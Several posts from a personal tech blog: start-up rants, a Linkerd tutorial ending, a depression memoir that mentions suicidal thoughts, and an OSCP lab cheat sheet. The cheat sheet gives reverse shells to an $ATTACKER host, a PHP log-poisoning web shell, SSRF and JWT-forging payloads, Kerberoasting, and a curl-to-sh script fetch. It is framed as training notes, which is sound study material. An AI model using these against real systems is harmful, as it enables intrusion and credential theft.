tls=false in linkerd viz tap — the source pod isn’t meshed, or the destination isn’t. Check both have 2/2 containers running.
Where to Go Next
Real things to try once you’re comfortable:
- Multicluster. Linkerd’s multicluster extension lets meshes span clusters with mTLS-everywhere over the public internet — useful for HA across regions, gradual cluster migration, or tying staging to a separate cluster.
- Service Profiles and retry budgets. Define per-route retry policies and timeouts in YAML; let the mesh handle transient failures without app code knowing.
- Replace Viz Prometheus with your own. The bundled Prometheus is fine for play; in prod, point Linkerd’s metrics at your existing Prometheus or Mimir.
- Argo Rollouts + Linkerd. Progressive delivery using
HTTPRouteweights, automated based on success-rate metrics from the mesh. - Run Buoyant Cloud or self-hosted Buoyant Enterprise for Linkerd if you want a managed control plane — same OSS Linkerd underneath, with extras for compliance and FIPS.
Additional Resources
- Linkerd Documentation — official, current, comprehensive.
- Linkerd Slack — surprisingly responsive for an OSS project.
- Minikube Documentation — for managing your local cluster.
- 5-Week DevOps Training Plan — service mesh, K8s, and the rest of the curriculum this fits into.
![]()
All Change!
I've changed direction, kinda
Well it's been a while.
Things have changed, and I hope for the better. I've taken a step in a different direction. Don't get me wrong, I still wish to pursue a career in security, but I had to accept that the offers were not going to just come to me without experience or another avenue.
For background, I have worked in a number of start‑ups, and they are a different environment to work in. They are fickle, risky, challenging, but offer close‑knit teams and a sense of adventure you don't get elsewhere.
Joining early will give an opportunity to grow, but you have to be comfortable with change. You need to be happy to fill any space that is required. If you are a dev and that is all you do, then a start‑up may not be the place for you. When the server breaks, if you aren't prepared to roll up your sleeves and get your hands dirty, you're not right for it. This can be the attractiveness of a start‑up: not being a one‑trick pony.
Well, I was in a start‑up, but it had grown and was no longer a real start‑up. I won't go deeply into it, but it had lost its way in many places. Successful? Yeah. It was almost making money and was on the path to greatness, but this was at the expense of the people. It may catch this and try to turn it around, but it had made many of the mistakes start‑ups make and was way too top‑heavy and no longer nimble. Push‑down mentality, and there was a lot of unhappiness and anger that, after threats of leaving, union action and lots of letters, emails, meetings, surveys (oh, the constant surveys that are so skewed to get the answers they want, or stats that are skewed), they were trying to change, but in completely the wrong way.
Just to cover the type of skew they used in an update:
- Latest: “We have a happiness rating of 45%” – that is as good as the rest of the industry and so we are happy.
- 1 year earlier: “We have a happiness rating of 85%” – we are very proud of this and lead the industry.
A trick employed (an old one) is to have Q1, just before this, be:
- Highlight a recent moment that has made you happy at work
then:
- Q2: On a scale of 1 to 4, how would you describe your overall sense of happiness?
- 1: Unhappy – I never experience joy and satisfaction in my daily life.
- 2: Happy – I generally feel positive and appreciate the good moments, even when faced with challenges.
- 3: Slightly Happy – I often find reasons to smile and enjoy life's little pleasures, contributing to my overall well‑being.
- 4: Very Happy – I experience a deep sense of joy and fulfilment, embracing each day with enthusiasm and positivity.
Appraisal: you are scored from 4:
- 1 = Below expectation
- 2 = Meeting or exceeding expectation
- 3 = Working well beyond expectation
- 4 = You lead the way
This was so skewed that only those with a 4 were considered for pay rises or promotion, plus there was a cap on the numbers you could give, promotions and raises.
Everything is about being as good as others in the industry. There used to be a desire to be the best, lead the way and exceed. This change to be “as good as the industry” after so long leading was, to many, failing and a degrading of the values and drive.
They made changes, did new stuff, but then blamed the workforce for not joining in. People are sick of the place and people. Imagine telling your partner that they never take you out, and they then send YOU a ticket to the cinema – it's not the same. So when a company has lost its care for the people, to then offer opportunities to spend time with the execs, yet they are time‑restricted and scheduled, it's not the same as hanging out together. Just a huge disconnect – the heart was gone. It needed a change of leadership and genuine honesty, care and to regain trust.
So, as I say this in a past manner, I have left there. I was exceedingly loyal, gave chance after chance for the promises I was given to come to fruition, but all were, it appears, lies. There were too many career managers riding a gravy train. If you are unsure what I mean, these are people that manage for the money and are only interested in career progression, to get to the next level and pay increase. They are not interested in the company or the people. Generally, they have great CVs as they have worked for many companies in good positions. They always appear to have been ready for the next challenge. This all falls on its arse when they have to really do the job. When they meet a company where honesty was the foundation it's built on, they don't like being held to account. Some had been successful using a manner that was very different and counter to the company values; this was never challenged. There were bullies that were not held to account but had another layer placed under them, racists that were reported but never sacked, just moved (promoted :O). This caused a huge swathe of leavers that all gave their reasons for leaving, but no action was taken to stem the flood of leavers.
As I said, this isn't my first rodeo in a start‑up, and this is a mistake start‑ups make time and time again, until the IPO or takeover, and then it's a slow decline or just a corporate train ride/wreck.
So, it's no longer nimble, I can't trust anyone, there is no real career progression, so time to move. I want to work in security, and I don't have the experience, only a desire. I have a full‑time role that is taking all my time up because I care about the company still. I still care and felt a lot of heart there.
I have moved to another start‑up:
Why? Well, because it is at the phase of real care and growth.
Is it security? Well, no and maybe. It is at the point where everyone has every job, so it does include security and could grow to a full‑time role. Even if it doesn't, I'm finding this a challenge and really enjoying it.
Now, I'm so much happier. I have space to learn, experience and grow.
This blog is going to have to change as I'm not concentrating on security. I'm at present concentrating on Kubernetes and tools around it; I'm now in the GCP world and AI.
I'll get back to security, and I hope to start enjoying the learning as opposed to feeling it is a bind I need to chase to get away from the hell‑hole I was in and be a career choice. Looking forward: if I take the role of security here, I will organically gain experience, but I'm happier than I've ever been. Even the imposter syndrome is edging away a bit.
Well, I'll be hopefully back to more regular updates, and they may be covering other subjects, but it's all important. Understand K8s and Helm, KEDA, GitLab CI, and it is all stuff that needs securing. Understanding as much as possible is important. Just like a dev – learn one language well and you can then turn your hand to others easier.
![]()
Well it's been months, how's it going!
Not well
My training: slow progress, steady growth
Embarking into the world of cyber security is exciting and challenging. For someone like me it's daunting, and I see the level of knowledge I don't have (no Dunning–Kruger here, matey).
My pursuit of training has been met with a reality check – progress is slow, but the baby steps I make are undeniably rewarding.
Firstly, I delved into platforms like Hack The Box and TryHackMe, enticed by promises of hands‑on experience and real‑world simulations. The allure of solving challenges and honing my skills was irresistible. Yet, as I immersed myself in these virtual environments, I quickly realised that it's far from easy, as expected, but even with walkthroughs it's slow going.
Trying to understand the process and methods is really fun but it's very slow, and I have this inbuilt feeling that I'm too slow and do feel time is running out to start the career – but I need real‑world knowledge.
As said, it's fun and brings into use lots of bits from university that were covered in cyber sec modules. The programming done in uni is now needing to be pulled back from the rear of my mind to present. All very exciting, and I feel each small step is one step nearer to mastery (still not confident). Some of the skills I'm picking up are making me look at things in a different manner – like perusing website input boxes as a place for manipulation and a weak point.
TryHackMe has been great; it has presented me with lots of machines, each presenting unique obstacles to overcome. Concepts that seemed straightforward on paper have, in practice, baffled me. In exploiting vulnerabilities, I found myself grappling with networking protocols, cryptography, and other principles, building the complexity as we go. Each step has needed patience and ultimately a walkthrough, but I can feel the confidence building as I look at the attack surfaces and have some skills to at least start to look for issues before tapping out.
THM has offered a guided approach, with structured learning paths and interactive tutorials, yet some of the boxes have had me scratching my head for hours. But with each step, each success is a huge level of satisfaction that adds to my determination to continue.
I've also reached out to some online groups and events to find some support. The cyber security genre is daunting and so far has pushed me away. I do feel there is a wish to be open, but there are a lot of people that are chasing money over the passion – that may be the issue.
In the events and communities, those at the leading edge speak with such passion and, when you walk away from this to the general workforce, there are many just giving the industry a bad rap.
Joining local meetups and online forums exposed me to a wealth of knowledge and expertise but has also highlighted the width of the field and the daunting task of keeping pace with its rapid evolution. Conversations with seasoned professionals served as both inspiration and humbling reminders of how much I had yet to learn. When you do get to speak to the seasoned persons, they are welcoming; further down though, the Dunning–Kruger really kicks in as lack of knowledge, shouting louder to appear clever and push away anyone that will find out, is creeping in as in other areas of the tech industry.
I'm slowly seeing each troubled step as a lesson, teaching me resilience and fortitude. I think I'm getting easier with the slow pace of my journey, recognising that deep knowledge can't be rushed. As I continue my training, I am reminded of a quote by Bruce Lee:
“I fear not the man who has practised 10,000 kicks once, but I fear the man who has practised one kick 10,000 times.”
I hope it's not about how quickly I progress, but rather the depth of understanding and expertise I cultivate along the way.
So, to my fellow aspiring hackers facing similar struggles, I offer this advice: embrace the journey, celebrate the victories, and learn from the defeats. Rome wasn't built in a day, and neither is a master hacker. Slow progress is still progress, and with perseverance, we will reach our destination.
A person is not judged by how many times they are knocked down, but how many times they get up to keep fighting on. OSCP seems a long way away but I will get there; I just might jump on the HTB cert first.
Now I need two more docs to level up the three columns.
![]()
Hacking my way to OSCP!
Not another wannabe hacker!
Learning hacking and pursuing the OSCP certification
So, another moron thinking they could be a HACKER. As someone passionate about digital security, I've decided to pursue a career and follow along on an exciting journey into the world of ethical hacking.
My ultimate goal? Attaining the Offensive Security Certified Professional (OSCP) certification.
I'm going to write up my notes and you can follow me on this adventure into cybersecurity, its challenges, and my pursuit of knowledge.
Introduction
My intentions are purely ethical (honest guvnor).
I covered cyber security at university and so this is the next step for me. I love digital forensics, started down the route of reverse engineering, played with some other areas but, as with most uni modules, they are quick and high‑level.
It's now time to break away from my present area of tech and follow what I really wish to be doing. The genre is wide, as wide as any area of tech. I'd like to hit offensive / red team.
Why learn hacking?
Learning hacking isn't just about gaining unauthorised access to systems; it's about understanding how they work and how to secure them. With the increasing frequency and sophistication of cyber‑attacks, ethical hackers play a pivotal role in safeguarding digital landscapes.
I'd like to be part of that fight‑back, keep people safe and learn.
Getting started
To kick‑start my journey, I'm diving into the basics of networking, operating systems, and programming languages. Understanding the foundations is key to becoming a proficient ethical hacker.
I have signed up to the TryHackMe website. It's not cheap but I believe you do need to invest and back yourself at times. I have possibly made a mistake as all guidance seems to point at Hack The Box, but you work with what you have. Security wasn't part of the company I work at when I started, so changing direction is hard, but I have made my intentions clear and have company backing to scratch my itch (as long as I keep doing my existing job).
Learning resources
A couple of books I've been advised to look at:
Books
- Hacking: The Art of Exploitation by Jon Erickson
- Metasploit: The Penetration Tester's Guide by David Kennedy
Online platforms
Utilise platforms like:
- Hack The Box
- TryHackMe
- OverTheWire
for hands‑on practice.
Building practical skills
Theory is essential, but practical experience is where the real learning happens. I plan to immerse myself in real‑world scenarios, honing my skills through simulated environments and challenges.
As said, TryHackMe is my go‑to as we speak. I have a life, so have limited free‑time (I work to live). I really wish to just enjoy work (as best you can).
Preparing for OSCP
The Offensive Security Certified Professional (OSCP) is a respected certification in the cybersecurity field. To prepare, I'll be dedicating time to THM and then the OSCP syllabus, engaging in labs, and working on vulnerable machines to develop the practical skills required for the exam.
Challenges and rewards
Undoubtedly, this journey will be challenging. Hurdles will emerge, and problem‑solving skills will be put to the test. Yet, the satisfaction of overcoming challenges and contributing to a safer digital world makes it all worthwhile.
Conclusion
As I document my progress, struggles, and victories, I will be smashing my notes on the THM pathways here. I invite you to join me on this learning adventure. Whether you're a seasoned professional or a fellow enthusiast, your insights and support are invaluable. Together, let's explore the exciting and ever‑evolving field of ethical hacking.
Stay tuned for updates, and let's hack responsibly! 💻🔒
![]()
Hacking my notes on my way to OSCP!
Hacker Dumps!
Living Notes on the Way to OSCP
This is a running dump — the muscle-memory commands, the quick-reference patterns, and the “I’ve forgotten how to do X for the third time” cheats I keep coming back to while training for OSCP and adjacent labs. Less essay, more lab notebook. I’ll keep adding as I learn.
For the longer-form companion thinking, see The Race to OSCP. For where to actually practise this stuff safely, Building a Home Lab to Learn Hacking Without Going to Jail. For the writeup discipline, How To Write a CTF Writeup That’s Actually Worth Reading.
Recon: The First Twenty Minutes
The full TCP and UDP sweep that catches what most people miss:
# fast TCP across all ports
sudo nmap -p- --min-rate 5000 -T4 -oN nmap-fast.txt $TARGET
# extract open ports for the targeted service scan
PORTS=$(grep ^[0-9] nmap-fast.txt | cut -d/ -f1 | tr '\n' , | sed 's/,$//')
# version + default scripts on what's actually open
sudo nmap -sCV -p$PORTS -oN nmap-services.txt $TARGET
# top UDP ports — slow, run it in another tmux pane
sudo nmap -sU --top-ports 200 -oN nmap-udp.txt $TARGET
Web fuzzing baseline:
ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,204,301,302,403
ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -e .php,.txt,.bak,.zip
ffuf -H "Host: FUZZ.$TARGET" -u http://$TARGET -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fc 404
SMB/RPC enumeration on Windows-flavoured boxes:
crackmapexec smb $TARGET --shares
enum4linux-ng -A $TARGET
nxc smb $TARGET -u '' -p '' --users
Web App Bug Patterns I Always Forget
SQL injection — the manual sanity check before sqlmap:
' → server error / different response = candidate
' OR '1'='1 → true-condition test
' UNION SELECT NULL -- → adjust NULL count until no error
Then sqlmap -u "$URL" --batch --risk=2 --level=3 only after you’ve confirmed the candidate manually. Lab only.
Local file inclusion to RCE (the log-poisoning route):
?file=../../../../var/log/apache2/access.log
# poison the log:
curl http://target/ -A "<?php system(\$_GET['c']); ?>"
# trigger:
?file=../../../../var/log/apache2/access.log&c=id
SSRF starter payloads to test:
http://127.0.0.1:80/
http://localhost:8080/
http://169.254.169.254/latest/meta-data/ # AWS IMDSv1
file:///etc/passwd
gopher://127.0.0.1:6379/_INFO # Redis if reachable
JWT mischief (the full pattern in Auth, OAuth, and JWTs: How They Work and How Attackers Break Them):
# alg:none forge
python3 -c "import jwt; print(jwt.encode({'sub':'admin','role':'admin'}, '', algorithm='none'))"
# brute weak HMAC
hashcat -a 0 -m 16500 token.txt /usr/share/wordlists/rockyou.txt
Linux Privesc One-Liners
The boring-but-essential checks, in order:
# kernel + distro version (then check exploit-db)
uname -a && cat /etc/os-release
# sudo without a password?
sudo -l
# SUID binaries that aren't standard (cross-reference GTFOBins)
find / -perm -4000 -type f 2>/dev/null | grep -vE '^/(usr|bin|sbin)/(s?bin/)?(passwd|chsh|chfn|gpasswd|newgrp|mount|umount|su|sudo|pkexec|fusermount)$'
# writable cron jobs / paths
ls -la /etc/cron* /var/spool/cron/ 2>/dev/null
find / -writable -type f \( -path /proc -prune \) -prune -o -print 2>/dev/null | grep -E 'cron|init|systemd'
# capabilities the kernel might give you (cap_setuid is a winner)
getcap -r / 2>/dev/null
# all-in-one
curl -s https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/linPEAS/linpeas.sh | sh
Always read GTFOBins for any unusual binary you find SUID. Half the boxes are won there.
Windows Privesc One-Liners
# basic enumeration
whoami /priv
whoami /groups
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# unquoted service paths
wmic service get name,displayname,pathname,startmode |
findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# AlwaysInstallElevated check (rare but devastating when set)
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# heavy lifting
.\winPEAS.exe
For AD-joined boxes, the BloodHound + Impacket workflow lives in the Home Lab post.
Reverse Shells That Actually Work
The cheat I always forget which flag goes where:
# Linux bash
bash -c 'bash -i >& /dev/tcp/$ATTACKER/4444 0>&1'
# Linux Python (when bash is broken)
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("'$ATTACKER'",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'
# Windows PowerShell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('$ATTACKER',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$x=(iex $d 2>&1|Out-String);$x2=$x+'PS '+(pwd).Path+'> ';$s.Write([Text.Encoding]::ASCII.GetBytes($x2),0,$x2.Length);$s.Flush()};$c.Close()"
Upgrade a dumb shell to a proper TTY (the post-RCE classic):
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl-Z to background
stty raw -echo; fg
export TERM=xterm
# resize the term to match your local
stty rows 50 cols 200
Kerberoasting Quick Reference
# from a domain-joined attacker box
GetUserSPNs.py -dc-ip $DC -request -outputfile spns.txt 'DOMAIN.LOCAL/user:password'
# crack the TGS
hashcat -a 0 -m 13100 spns.txt /usr/share/wordlists/rockyou.txt
AS-REP roasting (for users with DONT_REQ_PREAUTH):
GetNPUsers.py -dc-ip $DC -no-pass -usersfile users.txt 'DOMAIN.LOCAL/'
hashcat -a 0 -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Reference Links I Keep Coming Back To
- Cheatsheets — HackTricks, PayloadsAllTheThings, HighOn.Coffee, GTFOBins, LOLBAS.
- Wordlists — SecLists. Already in
/usr/share/seclists/on Kali. - Local privesc enumeration — PEASS-ng (linPEAS / winPEAS).
- AD attacks — Impacket, BloodHound.
- Web — PortSwigger Web Security Academy — the best free training in the field, full stop.
- Practice platforms — TryHackMe SOC L1 + Jr Pen Tester, HTB Academy, OffSec Proving Grounds, PortSwigger Academy.
Final Thought
OSCP — and any hands-on cert — rewards reps and methodology, not memorisation. Every box runs the same general loop: enumerate exhaustively, identify candidates, exploit one, get a foothold, enumerate again, escalate. The commands above are the muscle-memory bits; the methodology and the writeup discipline (see How To Write a CTF Writeup) are what turn reps into skill.
These notes get updated as I find better one-liners. If you spot something out of date or have a better way to do any of the above, let me know.
![]()
The race to IPO
The tech start-up, a poisoned and crazy journey
The Perils of Start-up Life: A Personal Perspective
While the allure of going public may seem like the pinnacle of success, the reality often unveils a different story.
My journey has led me through the treacherous landscape of start-ups aiming for the coveted Initial Public Offering (IPO). While the allure of going public may seem like the pinnacle of success, the reality often unveils a different story—a tale of trials and tribulations that can jeopardise the very core of a company, and the human toll is devastating.
The Initial Dream
In its infancy, a start-up is a collective of passionate minds, driven by innovation and a shared vision to disrupt industries. Part of this dream is that you may witness the metamorphosis into a publicly traded entity, reaping the collective rewards of tireless dedication. However, the path to an IPO is fraught with challenges, and the toll it takes on the individuals within the company is often overlooked.
The Funding Conundrum
Start-ups, in their pursuit of IPO, frequently find themselves entangled in a complex web of venture capitalists, angel investors, and institutional funding. The relentless pressure to meet valuation targets and attract investors can result in compromises that not only undermine the very ethos of the start-up but also lead to the loss of valued team members along the way.
The Sacrifice of Innovation
As the focus shifts from innovation to meeting financial milestones, start-ups may inadvertently sacrifice the essence of what made them unique. The relentless pursuit of profit margins and shareholder value can stifle creativity, hindering the very innovation that propelled the company into the limelight.
The Shattered Togetherness
Start-ups are celebrated for their dynamic and close‑knit cultures. However, the quest for an IPO strains these bonds, transforming the once‑familial atmosphere into a rigid corporate structure. The loss of togetherness is palpable, leaving employees feeling detached from the companys initial vision and from each other.
Greed takes over and the vultures sail in. The people that created this unicorn are pushed aside for those that have travelled the IPO course, those with a laser focus on the IPO goal. They have no values, they are not part of the company, they are here to benefit themselves only. They will not be here after IPO as they take their chunk from the work others have given and leave the shattered shell of this once great place. Those that stayed, who endured the long hard road, are left to look at the remains and try to resuscitate it.
I know from experience, it will never reach the lofty heights again. It will have the meat taken from the bones. I've been through this all before and remained to see the slow death. It may remain in name, it may shape‑shift, but it will never be the peacock it once was.
I know of a few companies that have held steadfast to their values. They remain great places to be and generally stay private or get bought and then ruined (unless an equally great place merges – rare).
Many will get rich financially but they are rotten to the core and poor inside.
The Human Cost of Meeting Expectations
The run to an IPO initiates a Sisyphean race against time. Start-ups grapple with the demands of scaling operations, ensuring profitability, and complying with regulations. The pressure to meet the expectations of shareholders and analysts can lead to rushed decisions, resulting in the loss of both talented individuals and the core values that defined the company.
There is the build‑up of teams and the business, then the cash‑out and lay‑off to colour the books, lives wrecked as the values disappear, as the greed takes over and the once trusted leaders turn their backs on the loyal teams. True colours show and it is ugly.
There isn't a build of a great company anymore but an illusion to sell to a fickle market – smoke and mirrors – an illusion of profitability of a company that really was built with x number but now has a skeleton, over‑worked, under‑paid, hurt workforce that is not sustainable long term.
This is a tale that is old, but no one bucks the trend; cyclic behaviour and greed is what we have.
Conclusion
I've witnessed firsthand the human toll of the pursuit of an IPO and the shattered remains that exist after. The initial dream of creating something extraordinary often gives way to the erosion of togetherness, the loss of valued team members, and the compromise of the very values that defined the company.
It's crucial for founders and stakeholders alike to navigate this journey with caution, ensuring that the very essence of the start-up isn't lost amidst the chaos. They may get rich, but think: is this hollow person who you really set out to be? Is this the legacy you wish to have? Is this the type of values you would like to be applied to your children? Would you treat them as such?
When you are seeing resources over people, is this who you set out to be?
In the grand tapestry of start‑up life, the cost of an IPO should never be measured solely in financial terms. The true tragedy lies in the loss of the human connection, the disintegration of shared values, and the collective spirit that once defined the start‑ups identity.
Be true to you, live a proud life.
![]()
Well it went wrong big time! NSFW
Well if you don't work, you can't F*CK UP!
So, you've made a BIG mistake?
There are little mistakes made each day that go unnoticed but every now and again a bigger one is made. So what do you do?
Well, if you are that person who sits back and rides the coat‑tails of others, pops a helpful line into Slack and walks away as an incident is in progress, just points out what is only known with hindsight… fuck you.
These are those that like to get noticed for being helpful! You can't really say “fuck off, you are being an arse”, as “what? I was just helping” is the reply, but we all know what you are up to.
I was asked on an FLT course a long time ago – “if you crash into a door, what do you do?”. Everyone said you ensure the area is safe, ensure you park the vehicle in a safe place, exit the vehicle in a safe manner, ensure the damage is reported… blah blah blah…
The instructor said NO!!! You will quickly look around to see if anyone has seen you. It is human nature. It is no different in tech.
There are little mistakes made each day that go unnoticed but every now and again a bigger one is made. So what do you do?
What you should do and what you do are different. You WILL try to fix it quickly. What you should do is inform everyone as soon as you are aware.
My advice in life has always been: tell the truth. People will respect you more, will trust you more and it is so much easier to live as you do not have to remember the lies.
What do you think your peers would prefer though:
- OMG I've F'ed up and I will need to fix it
OR - I did F up but I fixed it so we are good.
I suspect the latter BUT that all depends on time and pressure.
If the issue is seen, then questions will be asked so immediate declaration is best. If your peers don't like being spooked for no reason then a quick fix is best.
So what should you do
I go with a small time frame. If you F up big‑time, collect the issue, the possible solutions and, if possible, rectify – but if you can't, declare NOW.
I don't know whether that is the best solution but that is what I'd prefer if I was the one getting the news:
- I've made this issue
- It is due to this
- I've tried this
- I believe this will fix the issue
But won't that damage my rep?
Yes.
There you go. That is it.
Honestly, those that do not make mistakes are either liars or lazy (or have great PR).
If you are working hard and pushing the limits, things will happen – that is tech – and testing and trying new things is the way we get better.
It's all about how you handle it. If you have made this mistake three times then maybe you should ask yourself a question or two, because it can be assured your boss will. BUT, if you have a logical reason why you took an approach, can indicate you did what you thought was right, and you stick around to fix the issue…
Well, you are a good engineer and one I'd be happy to work beside. Dust yourself off, learn from that lesson.
So who will (does) piss you off
Now I will add that with 20/20 vision – that is hindsight – some of those safety blankets you made, some of your decisions, may not in the cold light of day hold up to scrutiny and fold like an origami frog BUT you had them and you have learned a lesson on how not to do it and so have improved.
So why the rant in the first paragraph?
Well there are plenty of people who enjoy others' misfortune. They are scum but they are there. They are not helping but looking for their own glory.
Imagine, you have created a huge script, spent days perfecting it, adding output to indicate errors, monitored it, tweaking it and then it runs on the live system… BOOM. It doesn't behave as expected but, due to your hard work, the output identifies the issue, the safety blanket you put in place means that it can be remedied quickly but it will mean the issue does affect a number of people temporarily. So, here we go.
Type 1:
“Hey, I've seen this error!!!” – and they are happy to back off while it is fixed, even extending the offer privately of help if needed.
These people are great. Admittedly their mood may change and become a little less patient if the issue becomes a longer issue, yet they understand that if it does become large, it will become a large issue that will not be helped by them getting gnarly.
Type 2:
“Hey, I've seen this error,” and they start to tell you how inconvenient it is to them and how safeties should have been in place and the roll‑back system should be more robust and that they will need to escalate this up the next couple of levels…
Actually, they are right and that will all be in the lessons learned and how we incrementally improve systems BUT – fuck off.
It's not the right time, what are they playing at.
Are they helping? NO. Are they trying to express how hard they are working and how important they are… again – fuck off.
Type 3:
“Oh, I see you have an issue, if you'd have done x or y this wouldn't have happened, just offering this for the future.”
Not now, dickhead, you are not helping and are sidetracking the fix but yeah:
- thanks
- yeah you've got your name out there as knowing lots, albeit on an issue that has occurred, as opposed to not yet occurred when we were working on it – which is where we came from.
Type 4:
“If you need help I'm here!!!” … you reach out and they are nowhere to be seen.
Well done, you got your name in there… jerk.
Type 5:
“Shit, I'd love to help but I have a family emergency.”
Odd that these only occur when there is an issue!!! but you got your name in the list for people to see…
Type 6:
“Hey, @manager1, 2 and 3 – the issue Geeky is having, I've found the cause and here is the solution.”
Thanks, but why not be a team player, offer the help to those fixing the issue as opposed to the managers.
Good managers know instinctively that you are a no‑good arsehole but you may fall lucky and find a sucker.
You are an arse and the scourge of any industry; nobody likes you nor trusts you. You know those close colleagues you have? They are keeping their enemies closer, that is all.
I can list lots more but my advice to you is: privately offer help, be patient. That's it, it's not hard.
Advice and moan over :D
![]()
I need a Gmail app on my desktop!
Ah, you can make one in a few clicks!
Need a Google app?
I was looking for a Gmail app. I was astounded that there isn't one.
You can use email apps, but what if there was a simpler solution?
This is quick :P
Here we go
You are going to need to have Chrome installed – booooo!
I know it's not always the first choice, but it is handy to have a second browser so you can check issues.
So:
- Open Chrome and go to your Google Mail (Gmail).
- In the menu bar find the three vertical dots (near your boat race in the top right).
- Click on the icon.
- Go to
“More tools”– changed by Google, now use “Save and Share”. - Click “Create shortcut”.
- In the window that pops up:
- Enter a name for your shortcut and ensure that you tick the box for “Open as window”.
- Click “Create”.
Locate the created Gmail icon, click, and now you have a Gmail app :D
On the Mac you can set it up to open on login and stay in the dock – right‑click and select the options.
There you go, quite a quick one.
![]()
Mental State
Yeah, everybody has an issue!
No-one said this blog was just tech!
Well, everybody is depressed arnt they??
Is mental health a bandwagon that has become fashionable? It is a shame that it can be seen this way. Fed up, down in the dumps, a bit sad!! all are moods but they are not depression.
Looking for a description (not mine) -
Depression is a serious mental health condition, characterised by persistent feelings of sadness, hopelessness, and a loss or lack of interest in activities. Depression can be caused by many factors including genetics, life events including chemical imbalances of the brain.
Symptoms include:
- Feeling persistently sad or empty
- Loss of interest
- Sleep disturbances, insomnia or oversleeping
- Fatigue or lack of energy
- Change of appetite
- Change of weight
- Difficulty concentrating, making decisions, memory issues like remembering things
- Feeling worthless, guilty or helplessness
- Thoughts of death or suicide
- A feeling of whats the point
Depression can be treated with a combination of therapy, medication, and lifestyle changes. Therapy, such as cognitive-behavioural therapy or talk therapy, can help individuals identify negative thought patterns and develop coping mechanisms. Medication, such as antidepressants, can help correct chemical imbalances in the brain. Lifestyle changes, such as exercise, healthy eating, and stress reduction, can also be helpful in managing depression.
If you or someone you know is struggling with depression, it is important to seek help from a healthcare professional. Depression is a treatable condition, and with the right support and resources, individuals can recover and live fulfilling lives.
A little like a star sign, we can all get it to fit
Those symptoms could fit anyone couldn't they. Tired a lot? yeah! could be depression Feel worthless? Could be depression… or they could be in the first case, drinking a lot, over working, bad mattress, second, your partner is a bad person, grief for a recent loss - There are lots of reasons.
So, Yeah I have depression
I've heard this so many times.
- “I suffer from depression!!!!”
- “Oh, When were you diagnosed?”
when I hear
- “Oh, I self diagnosed”
Im like - what, I bet your pardon!!!!
- “Why you being an arse and so rude?”
- “Its my autism, i cant help it”…
Shut up, persons who have autism arnt arseholes!!! youre just being a dick and looking for an excuse.
I've heard this with all the “trendy” terms/issues we have these days
- Autism
- Gender issues
- Dyslexia
- Asperger
- the list goes on…..
Believe me, I have empathy for genuine cases but everybody seems to be looking for an issue, an excuse for something.
If you genuinely have any of these issues or concerns, you need to see a professional.
So, I have been diagnosed and its not the first time and here I will tell you my story (some parts of my story are redacted for privacy etc, but i hope this will help if you are in a similar situation)
How did I find out
When I was younger, early 20s, I found out.
I used to be, as a child, quite withdrawn, quiet. I wont cover it here but my childhood kinda sucked but I was by the age of around 14 kinda happy with me. I'd got to a point where I enjoyed being nice.
I found I could smile at an old lady on the bus and this would make her smile. This made me happy and being nice made me feel good.
I was still a quiet person and felt my life was pre planned due to social suroundings and it was just to be like all the others around the local area and that was fine.
I took an apprentice job and it went, in hindsight, as it generally does for a young, non worldly wise, young man - just ok but i was happy.
I had done a lot of growing between 18 and 20 (felt like a long time then), I gained a lot of confidence. I realised I could take on anything, speak to anyone etc.
Then it all starts going wrong.
I've always been quite trusting and had taken a job where I made a good friend. We would spend dinners together, laugh a lot, talked about our partners, advised each other and we were to grow in the workplace and life together.
Promotion came and they turned. I was so hurt. They lied about many things and this got me in trouble at work and demoted. I was so hurt and didn't know how to take this.
Id lost my outside of work best friend as they had found a partner who took a shine to me and made inappropriate asks of me. I told my friend of these comments and some how i was the bad one?.
It was all going a bit shit, my life was folding in on itself, I left I had no-one to reach out to, felt such a disappointment to my family, I had lost control.
I met a new person and we connected. This was a bad decision and I knew it. It wasn't the set up I was meant to connect with, it wasnt the plan my mother had but it felt good.
They were in a shitty space, I was in a shitty space. We could sit and talk for hours about anything.
I eventually told my mother and this was the start of a whole collapse of my relationship with her, thing were just getting worse.
I'm missing chunks out like my partners children hating me, being overlooked for promotions but ultimately I went to the doctors to talk about a medical condition and it turned out that I was suffering from what was referred to as a complete mental breakdown (this is not the term you can use now :D)
They advised me to take a break from everything and take some strong tranquilizers. I told my mother, and she said “Get a grip and don't tell anyone at work” - It would of been career suicide to say this at that time, and so I got a grip, took a two-week holiday, through the pills in the bin and painted on a smile and never spoke of the demons again.
Honestly, I wanted to die. Yeah, weak, running away, cowards way out…. these are many terms used and thoughts people have.
How easy would it be, no more pain, no more sadness, no more loneliness.
Why did I stay? Because my partner made me feel special and made me laugh and one of my partners children, a little girl that doted on me. She really loved me, I felt like I was her world, and we giggled a lot… I couldnt do it to her.
Now I can skip a lot as it was grey. I was never the same person. I had to wrestle each day just to get through, I became a passenger in life with those around me dictating what I did, how, where etc. I had moments of the old me where I would run with a little confidence but it would last days at most. I became unkind to myself and numb to life.
I was scarred and it was never going away, so many times I thought about dying but that would only help me, only take my ache away - when I love, I love deep and never wanted to hurt others.
So how do I describe the feeling of depression. If you tied a bungee rope to your back and started running. It would be easy at first and then…. it gets tighter and harder. Eventually, boing, you get pulled back into the dark pit (depression).
That is how my life was but it became a comfortable pain. It became an evil buddy. I felt that I wouldn't be me without it.
Now, we had a child. If you have children, you will know the feeling of oh my god, I am the rock this thing leans on FOREVER.
I started to feel trapped in life, just working to keep my family but, at times had some happiness, but the monster of depression ruins every part of your life.
